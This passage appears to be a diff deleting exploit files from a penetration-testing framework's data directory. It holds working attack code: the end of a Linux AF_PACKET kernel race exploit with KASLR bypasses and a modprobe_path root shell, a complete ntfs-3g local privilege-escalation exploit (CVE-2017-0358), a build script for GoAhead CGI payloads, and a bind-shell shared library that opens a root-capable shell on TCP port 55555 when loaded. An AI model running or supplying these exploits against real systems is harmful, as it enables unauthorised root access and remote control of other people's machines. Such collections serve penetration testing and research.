-            /* Kernel address space */
-            if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX) {
-                addr &= 0xffffffffff000000ul;
-                if (munmap((void*)0x66000000, 0x20000000000))
-                    dprintf("[-] munmap(): %m\n");
-                return addr;
-            }
-        }
-    }
-
-    if (munmap((void*)0x66000000, 0x20000000000))
-      dprintf("[-] munmap(): %m\n");
-
-    dprintf("[-] kernel base not found in mincore info leak\n");
-    return 0;
-}
-#endif
-
-// * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *
-
-unsigned long get_kernel_addr() {
-    unsigned long addr = 0;
-
-#if ENABLE_KASLR_BYPASS_KALLSYMS
-    addr = get_kernel_addr_kallsyms();
-    if (addr) return addr;
-#endif
-
-#if ENABLE_KASLR_BYPASS_SYSLOG
-    addr = get_kernel_addr_syslog();
-    if (addr) return addr;
-#endif
-
-#if ENABLE_KASLR_BYPASS_MINCORE
-    addr = get_kernel_addr_mincore();
-    if (addr) return addr;
-#endif
-
-    dprintf("[-] KASLR bypass failed\n");
-    exit(EXIT_FAILURE);
-
-    return 0;
-}
-
-// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
-
-void launch_rootshell(void)
-{
-    int fd;
-    char buf[256];
-    struct stat s;
-
-    fd = open(SYSCTL_PATH, O_WRONLY);
-
-    if(fd == -1) {
-        dprintf("[-] open(%s): %m\n", SYSCTL_PATH);
-        exit(EXIT_FAILURE);
-    }
-
-    memset(buf, '\x00', 256);
-
-    readlink("/proc/self/exe", (char *)&buf, 256);
-
-    write(fd, buf, strlen(buf)+1);
-
-    socket(AF_INET, SOCK_STREAM, 132);
-
-    if (stat(buf,&s) == 0 && s.st_uid == 0) {
-        dprintf("[+] binary executed by kernel, launching rootshell\n");
-        lseek(fd, 0, SEEK_SET);
-        write(fd, "/sbin/modprobe", 15);
-        close(fd);
-        execl(buf, buf, NULL);
-    } else {
-        dprintf("[-] could not create rootshell\n");
-        exit(EXIT_FAILURE);
-    }
-}
-
-void setup_sandbox() {
-    if (unshare(CLONE_NEWUSER) != 0) {
-        dprintf("[-] unshare(CLONE_NEWUSER): %m\n");
-        exit(EXIT_FAILURE);
-    }
-
-    if (unshare(CLONE_NEWNET) != 0) {
-        dprintf("[-] unshare(CLONE_NEWNET): %m\n");
-        exit(EXIT_FAILURE);
-    }
-}
-
-int main(int argc, char **argv)
-{
-    int status, pid;
-
-    if (getuid() == 0 && geteuid() == 0) {
-        chown("/proc/self/exe", 0, 0);
-        chmod("/proc/self/exe", 06755);
-        exit(0);
-    }
-
-    if (getuid() != 0 && geteuid() == 0) {
-        setresuid(0, 0, 0);
-        setresgid(0, 0, 0);
-        execl("/bin/bash", "bash", "-p", NULL);
-        exit(0);
-    }
-
-    dprintf("linux AF_PACKET race condition exploit by rebel\n");
-
-#if ENABLE_SYSTEM_CHECKS
-    dprintf("[.] checking system\n");
-    check_env();
-    dprintf("[~] done, looks good\n");
-#endif
-
-    dprintf("[.] checking kernel version\n");
-    detect_versions();
-    dprintf("[~] done, version looks good\n");
-
-#if ENABLE_KASLR_BYPASS
-    dprintf("[.] KASLR bypass enabled, getting kernel base address\n");
-    KERNEL_BASE = get_kernel_addr();
-    dprintf("[~] done, kernel text:     %lx\n", KERNEL_BASE);
-#endif
-
-    dprintf("[.] proc_dostring:         %lx\n", PROC_DOSTRING);
-    dprintf("[.] modprobe_path:         %lx\n", MODPROBE_PATH);
-    dprintf("[.] register_sysctl_table: %lx\n", REGISTER_SYSCTL_TABLE);
-    dprintf("[.] set_memory_rw:         %lx\n", SET_MEMORY_RW);
-
-    pid = fork();
-    if (pid == 0) {
-        dprintf("[.] setting up namespace sandbox\n");
-        setup_sandbox();
-        dprintf("[~] done, namespace sandbox set up\n");
-        wrapper();
-        exit(0);
-    }
-
-    waitpid(pid, &status, 0);
-
-    launch_rootshell();
-    return 0;
-}

data/exploits/CVE-2017-0358/sploit.c

@@ -1,196 +0,0 @@
-#define _GNU_SOURCE
-#include <stdbool.h>
-#include <errno.h>
-#include <sys/inotify.h>
-#include <unistd.h>
-#include <err.h>
-#include <stdlib.h>
-#include <sys/stat.h>
-#include <sys/types.h>
-#include <fcntl.h>
-#include <sys/eventfd.h>
-#include <signal.h>
-#include <poll.h>
-#include <stdio.h>
-#include <sys/prctl.h>
-#include <string.h>
-#include <sys/wait.h>
-#include <time.h>
-#include <sys/utsname.h>
-
-int main(void) {
-  /* prevent shell from backgrounding ntfs-3g when stopped */
-  pid_t initial_fork_child = fork();
-  if (initial_fork_child == -1)
-    err(1, "initial fork");
-  if (initial_fork_child != 0) {
-    int status;
-    if (waitpid(initial_fork_child, &status, 0) != initial_fork_child)
-      err(1, "waitpid");
-    execl("rootshell", "rootshell", NULL);
-    exit(0);
-  }
-
-  char buf[1000] = {0};
-  // Set up workspace with volume, mountpoint, modprobe config and module directory.
-  char template[] = "/tmp/ntfs_sploit.XXXXXX";
-  if (mkdtemp(template) == NULL)
-    err(1, "mkdtemp");
-  char volume[100], mountpoint[100], modprobe_confdir[100], modprobe_conffile[100];
-  sprintf(volume, "%s/volume", template);
-  sprintf(mountpoint, "%s/mountpoint", template);
-  sprintf(modprobe_confdir, "%s/modprobe.d", template);
-  sprintf(modprobe_conffile, "%s/sploit.conf", modprobe_confdir);
-  if (mkdir(volume, 0777) || mkdir(mountpoint, 0777) || mkdir(modprobe_confdir, 0777))
-    err(1, "mkdir");
-  int conffd = open(modprobe_conffile, O_WRONLY|O_CREAT, 0666);
-  if (conffd == -1)
-    err(1, "open modprobe config");
-  int suidfile_fd = open("rootshell", O_RDONLY);
-  if (suidfile_fd == -1)
-    err(1, "unable to open ./rootshell");
-  char modprobe_config[200];
-  sprintf(modprobe_config, "alias fuse rootmod\noptions rootmod suidfile_fd=%d\n", suidfile_fd);
-  if (write(conffd, modprobe_config, strlen(modprobe_config)) != strlen(modprobe_config))
-    errx(1, "modprobe config write failed");
-  close(conffd);
-  // module directory setup
-  char system_cmd[1000];
-  sprintf(system_cmd, "mkdir -p %s/lib/modules/$(uname -r) && cp rootmod.ko *.bin %s/lib/modules/$(uname -r)/",
-    template, template);
-  if (system(system_cmd))
-    errx(1, "shell command failed");
-
-  // Set up inotify watch for /proc/mounts.
-  // Note: /proc/mounts is a symlink to /proc/self/mounts, so
-  // the watch will only see accesses by this process.
-  int inotify_fd = inotify_init1(IN_CLOEXEC);
-  if (inotify_fd == -1)
-    err(1, "unable to create inotify fd?");
-  if (inotify_add_watch(inotify_fd, "/proc/mounts", IN_OPEN) == -1)
-    err(1, "unable to watch /proc/mounts");
-
-  // Set up inotify watch for /proc/filesystems.
-  // This can be used to detect whether we lost the race.
-  int fs_inotify_fd = inotify_init1(IN_CLOEXEC);
-  if (fs_inotify_fd == -1)
-    err(1, "unable to create inotify fd?");
-  if (inotify_add_watch(fs_inotify_fd, "/proc/filesystems", IN_OPEN) == -1)
-    err(1, "unable to watch /proc/filesystems");
-
-  // Set up inotify watch for /sbin/modprobe.
-  // This can be used to detect when we can release all our open files.
-  int modprobe_inotify_fd = inotify_init1(IN_CLOEXEC);
-  if (modprobe_inotify_fd == -1)
-    err(1, "unable to create inotify fd?");
-  if (inotify_add_watch(modprobe_inotify_fd, "/sbin/modprobe", IN_OPEN) == -1)
-    err(1, "unable to watch /sbin/modprobe");
-
-  int do_exec_pipe[2];
-  if (pipe2(do_exec_pipe, O_CLOEXEC))
-    err(1, "pipe");
-  pid_t child = fork();
-  if (child == -1)
-    err(1, "fork");
-  if (child != 0) {
-    if (read(do_exec_pipe[0], buf, 1) != 1)
-      errx(1, "pipe read failed");
-    char modprobe_opts[300];
-    sprintf(modprobe_opts, "-C %s -d %s", modprobe_confdir, template);
-    setenv("MODPROBE_OPTIONS", modprobe_opts, 1);
-    execlp("ntfs-3g", "ntfs-3g", volume, mountpoint, NULL);
-  }
-  child = getpid();
-
-  // Now launch ntfs-3g and wait until it opens /proc/mounts
-  if (write(do_exec_pipe[1], buf, 1) != 1)
-    errx(1, "pipe write failed");
-
-  if (read(inotify_fd, buf, sizeof(buf)) <= 0)
-    errx(1, "inotify read failed");
-  if (kill(getppid(), SIGSTOP))
-    err(1, "can't stop setuid parent");
-
-  // Check whether we won the main race.
-  struct pollfd poll_fds[1] = {{
-    .fd = fs_inotify_fd,
-    .events = POLLIN
-  }};
-  int poll_res = poll(poll_fds, 1, 100);
-  if (poll_res == -1)
-    err(1, "poll");
-  if (poll_res == 1) {
-    puts("looks like we lost the race");
-    if (kill(getppid(), SIGKILL))
-      perror("SIGKILL after lost race");
-    char rm_cmd[100];
-    sprintf(rm_cmd, "rm -rf %s", template);
-    system(rm_cmd);
-    exit(1);
-  }
-  puts("looks like we won the race");
-
-  // Open as many files as possible. Whenever we have
-  // a bunch of open files, move them into a new process.
-  int total_open_files = 0;
-  while (1) {
-    #define LIMIT 500
-    int open_files[LIMIT];
-    bool reached_limit = false;
-    int n_open_files;
-    for (n_open_files = 0; n_open_files < LIMIT; n_open_files++) {
-      open_files[n_open_files] = eventfd(0, 0);
-      if (open_files[n_open_files] == -1) {
-        if (errno != ENFILE)
-          err(1, "eventfd() failed");
-        printf("got ENFILE at %d total\n", total_open_files);
-        reached_limit = true;
-        break;
-      }
-      total_open_files++;
-    }
-    pid_t fd_stasher_child = fork();
-    if (fd_stasher_child == -1)
-      err(1, "fork (for eventfd holder)");
-    if (fd_stasher_child == 0) {
-      prctl(PR_SET_PDEATHSIG, SIGKILL);
-      // close PR_SET_PDEATHSIG race window
-      if (getppid() != child) raise(SIGKILL);
-      while (1) pause();
-    }
-    for (int i = 0; i < n_open_files; i++)
-      close(open_files[i]);
-    if (reached_limit)
-      break;
-  }
-
-  // Wake up ntfs-3g and keep allocating files, then free up
-  // the files as soon as we're reasonably certain that either
-  // modprobe was spawned or the attack failed.
-  if (kill(getppid(), SIGCONT))
-    err(1, "SIGCONT");
-
-  time_t start_time = time(NULL);
-  while (1) {
-    for (int i=0; i<1000; i++) {
-      int efd = eventfd(0, 0);
-      if (efd == -1 && errno != ENFILE)
-        err(1, "gapfiller eventfd() failed unexpectedly");
-    }
-    struct pollfd modprobe_poll_fds[1] = {{
-      .fd = modprobe_inotify_fd,
-      .events = POLLIN
-    }};
-    int modprobe_poll_res = poll(modprobe_poll_fds, 1, 0);
-    if (modprobe_poll_res == -1)
-      err(1, "poll");
-    if (modprobe_poll_res == 1) {
-      puts("yay, modprobe ran!");
-      exit(0);
-    }
-    if (time(NULL) > start_time + 3) {
-      puts("modprobe didn't run?");
-      exit(1);
-    }
-  }
-}

data/exploits/CVE-2017-17562/build.sh

@@ -1,48 +0,0 @@
-#!/bin/bash
-
-build () {
-  CC=$1
-  TARGET_SUFFIX=$2
-  CFLAGS=$3
-
-  echo "[*] Building for ${TARGET_SUFFIX}..."
-  for type in {shellcode,system,reverse,bind}
-   do ${CC} ${CFLAGS} -Wall -fPIC -fno-stack-protector -Os goahead-cgi-${type}.c -s -shared -o goahead-cgi-${type}-${TARGET_SUFFIX}.so
-  done
-}
-
-rm -f *.o *.so *.gz
-
-#
-# Linux GLIBC
-#
-
-# x86
-build "gcc" "linux-glibc-x86_64" "-m64 -D OLD_LIB_SET_2"
-build "gcc" "linux-glibc-x86" "-m32 -D OLD_LIB_SET_1"
-
-# ARM
-build "arm-linux-gnueabi-gcc-5" "linux-glibc-armel" "-march=armv5 -mlittle-endian"
-build "arm-linux-gnueabihf-gcc-5" "linux-glibc-armhf" "-march=armv7 -mlittle-endian"
-build "aarch64-linux-gnu-gcc-4.9" "linux-glibc-aarch64" ""
-
-# MIPS
-build "mips-linux-gnu-gcc-5" "linux-glibc-mips" "-D OLD_LIB_SET_1"
-build "mipsel-linux-gnu-gcc-5"  "linux-glibc-mipsel" "-D OLD_LIB_SET_1"
-build "mips64-linux-gnuabi64-gcc-5"  "linux-glibc-mips64" "-D OLD_LIB_SET_1"
-build "mips64el-linux-gnuabi64-gcc-5" "linux-glibc-mips64el" "-D OLD_LIB_SET_1"
-
-# SPARC
-build "sparc64-linux-gnu-gcc-5" "linux-glibc-sparc64" ""
-build "sparc64-linux-gnu-gcc-5" "linux-glibc-sparc" "-m32 -D OLD_LIB_SET_1"
-
-# PowerPC
-build "powerpc-linux-gnu-gcc-5" "linux-glibc-powerpc" "-D OLD_LIB_SET_1"
-build "powerpc64-linux-gnu-gcc-5" "linux-glibc-powerpc64" ""
-build "powerpc64le-linux-gnu-gcc-4.9" "linux-glibc-powerpc64le" ""
-
-# S390X
-build "s390x-linux-gnu-gcc-5" "linux-glibc-s390x" ""
-
-gzip -9 *.so
-rm -f *.o *.so

data/exploits/CVE-2017-17562/goahead-cgi-bind.c

@@ -1,96 +0,0 @@
-#include <arpa/inet.h>
-#include <netdb.h>
-#include <netinet/in.h>
-#include <stdbool.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <sys/mman.h>
-#include <sys/socket.h>
-#include <sys/types.h>
-#include <sys/wait.h>
-#include <unistd.h>
-
-#ifdef OLD_LIB_SET_1
-__asm__(".symver system,system@GLIBC_2.0");
-__asm__(".symver fork,fork@GLIBC_2.0");
-#endif
-
-#ifdef OLD_LIB_SET_2
-__asm__(".symver system,system@GLIBC_2.2.5");
-__asm__(".symver fork,fork@GLIBC_2.2.5");
-#endif
-
-static void _bind_tcp_shell(void) {
-
-  int sfd, fd, i;
-  struct sockaddr_in addr,saddr;
-  unsigned int saddr_len = sizeof(struct sockaddr_in);
-
-  char *lport = "55555";
-  char *shells[] = {
-    "/bin/bash",
-    "/usr/bin/bash",
-    "/bin/sh",
-    "/usr/bin/sh",
-    "/bin/ash",
-    "/usr/bin/ash",
-    "/bin/dash",
-    "/usr/bin/dash",
-    "/bin/csh",
-    "/usr/bin/csh",
-    "/bin/ksh",
-    "/usr/bin/ksh",
-    "/bin/busybox",
-    "/usr/bin/busybox",
-    NULL
-  };
-
-  sfd = socket(AF_INET, SOCK_STREAM, 0);
-  setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &(int){ 1 }, sizeof(int));
-
-  saddr.sin_family = AF_INET;
-  saddr.sin_port = htons(atoi(lport));
-  saddr.sin_addr.s_addr = INADDR_ANY;
-  bzero(&saddr.sin_zero, 8);
-
-  if (bind(sfd, (struct sockaddr *) &saddr, saddr_len) == -1) {
-    exit(1);
-  }
-
-  if (listen(sfd, 5) == -1) {
-    close(sfd);
-    exit(1);
-  }
-
-  fd = accept(sfd, (struct sockaddr *) &addr, &saddr_len);
-  close(sfd);
-
-  if (fd == -1) {
-    exit(1);
-  }
-
-  for (i=0; i<3; i++) {
-    dup2(fd, i);
-  }
-
-  /* Keep trying until execl() succeeds */
-  for (i=0; ; i++) {
-    if (shells[i] == NULL) break;
-    execl(shells[i], "sh", NULL);
-  }
-
-  /* Close the connection if we failed to find a shell */
-  close(fd);
-}
-
-static void _run_payload_(void) __attribute__((constructor));
-
-static void _run_payload_(void)
-{
-    unsetenv("LD_PRELOAD");
-    if (! fork())
-      _bind_tcp_shell();
-
-    exit(0);
-}